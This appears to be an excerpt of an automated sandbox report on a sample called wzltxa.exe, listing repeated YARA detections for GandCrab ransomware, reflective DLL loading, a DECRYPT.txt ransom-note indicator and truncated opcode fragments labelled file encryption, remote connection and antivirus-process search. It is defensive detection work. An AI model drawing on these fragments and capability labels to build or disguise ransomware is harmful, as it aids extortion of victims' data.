Process Memory Space: wzltxa.exe PID: 1200	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 1200	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 5280	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Click to see the 150 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
33.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
33.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
33.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
33.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
33.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
13.3.wzltxa.exe.3270000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
13.3.wzltxa.exe.3270000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
13.3.wzltxa.exe.3270000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
13.3.wzltxa.exe.3270000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
13.3.wzltxa.exe.3270000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
13.3.wzltxa.exe.3270000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
25.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
25.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
25.3.wzltxa.exe.3a00000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.3.wzltxa.exe.3a00000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.3.wzltxa.exe.3a00000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.3.wzltxa.exe.3a00000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.3.wzltxa.exe.3a00000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.3.wzltxa.exe.3a00000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
11.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
11.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
11.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
11.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
18.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
18.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
18.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
18.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
22.3.wzltxa.exe.3640000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.3.wzltxa.exe.3640000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.3.wzltxa.exe.3640000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.3.wzltxa.exe.3640000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.3.wzltxa.exe.3640000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.3.wzltxa.exe.3640000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
39.3.wzltxa.exe.4010000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
39.3.wzltxa.exe.4010000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
39.3.wzltxa.exe.4010000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.3.wzltxa.exe.4010000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
39.3.wzltxa.exe.4010000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.3.wzltxa.exe.4010000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.3.wzltxa.exe.2fa0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.3.wzltxa.exe.2fa0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.3.wzltxa.exe.2fa0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.3.wzltxa.exe.2fa0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.3.wzltxa.exe.2fa0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.3.wzltxa.exe.2fa0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
13.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
13.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
13.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
13.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
13.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
